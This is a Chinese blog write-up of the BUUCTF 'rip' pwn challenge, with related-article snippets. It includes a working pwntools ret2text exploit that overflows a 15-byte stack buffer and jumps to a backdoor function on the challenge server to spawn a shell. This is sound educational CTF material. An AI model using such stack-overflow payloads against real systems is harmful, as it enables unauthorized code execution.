buuctf rip

最新推荐文章于 2024-06-13 21:31:31 发布
最新推荐文章于 2024-06-13 21:31:31 发布
阅读量490 收藏
点赞数
分类专栏: buuctf 题目 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/121706425
版权
本文档展示了如何利用栈溢出漏洞和ret2text技术来构造payload,对远程目标进行攻击。通过填充缓冲区并设置返回地址,最终实现代码执行。涉及到的知识点包括栈溢出原理、gdb调试、elf文件解析以及远程连接和本地进程控制。
摘要由CSDN通过智能技术生成

rip

看一下保护
请添加图片描述
什么都没开
请添加图片描述

请添加图片描述
第6行有一个溢出,还有一个后门,直接ret2text。

payload中需要加上一个ret,平衡一下栈。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29880)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shell = 0x401186
ret = 0x0000000000401016

p1 = b'a' * (0xF + 8) + p64(ret) + p64(shell)
r.sendline(p1)



r.interactive()
z1r0.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1545
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
BUUCTF|rip
cm_zl
04-30 2132
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 5033
BUU CTF PWN 入门知识详解
buuctf-rip
Nike_name的博客
06-13 371
利用get危险函数和system/bin/sh 的栈溢出
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 655
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1269
(写得好详细我好爱(为什么payload有两种写法于。
BUUCTFrip
^_^
12-08 3294
这题和蒸米ROP的level3有点像。 检查安全机制。 用ida反汇编,可以看到是gets函数有个简单的栈溢出,偏移也很好计算,F+8=23 此外还发现一个fun函数可以直接跳转到这里来获取shell。 正常exp如下: from pwn import * p = process("./pwn1") #p = remote("node3.buuoj.cn",29399) payload = "a" * 23 +p64(0x401186) p.sendline(payload) p.interact
BUUCTF pwn rip
weixin_55190422的博客
11-03 305
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
RIP作业1111111
04-22
RIP作业1111111
浅析rip协议
02-20
RIP协议是一种在网关与主机之间交换路由选择信息的标准,本ppt对其进行了简要介绍
RIP协议解析.docx
10-13
RIP 协议解析 RIP(Routing Information Protocol)是一种较为简单的内部网关协议(Interior Gateway Protocol),它是一种基于距离矢量(Distance-Vector)算法的协议。RIP 协议只能以“跳数”来定义路由的开销。...
rip笔记及RIP配置实例
11-10
RIP(Routing Information Protocol,路由信息协议)是一种广泛使用的内部网关协议(IGP),它基于距离矢量算法,主要用于小型网络中。RIP的基本原理是通过计算到目标网络的跳数(HopCount)来衡量路径的距离。度量...
RIP 实验报告,rip实验报告
最新发布
07-11
根据给定的实验报告标题、描述以及部分内容,我们可以提炼出本次实验主要围绕RIP协议的基础配置及其实现过程展开。接下来将对实验的关键知识点进行详细阐述。 ### RIP协议简介 RIP(Routing Information Protocol...
rip-BUUCTF(栈溢出)
yuqie的博客
06-14 343
使用ida反汇编程序,发现是一个栈溢出类型,从函数中可以看出给了一个s数组,但没有对输入的长度作限制,因为是一个典型的栈溢出漏洞。然后从main函数之下的fun函数里可以看见一个后门。顺便记录一下后门地址为0x0000000000401186.先使用命令checksec 查看程序保护情况。 发现并没有canary保护。使用gdb结合pwndbg调试进程,计算我们覆盖到返回地址所需字节。使用快捷命令b在main函数处下断点,并使用r(run)运行。 使用命令 n 按行运行,找到输入点,并随便输入几个字
BUUCTFPwnrip 解题步骤
2301_81505831的博客
01-25 792
查看之后发现是64位的ELF文件,直接放入IDA64进行反编译。
[buuctf] rip
zn106414的博客
03-31 698
64位,源程序几乎没有开启任何保护 用ida打开 存在危险函数gets,没有限制输入,存在栈溢出漏洞 还有一个func函数执行了/bin/sh命令 双击s来到Stack of main视图,发现只需存入15个字节即可劫持函数返回地址 因为是64位程序,还需要加8字节的返回地址,因此偏移量为23 或者这里也可以使用pwntools计算一下: pattern create 200 pattern offset A(AADAA; 也可以...
BUUCTF-rip
m0_64180167的博客
04-11 670
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
BUUCTF -rip
weixin_56301399的博客
07-20 393
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2496
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值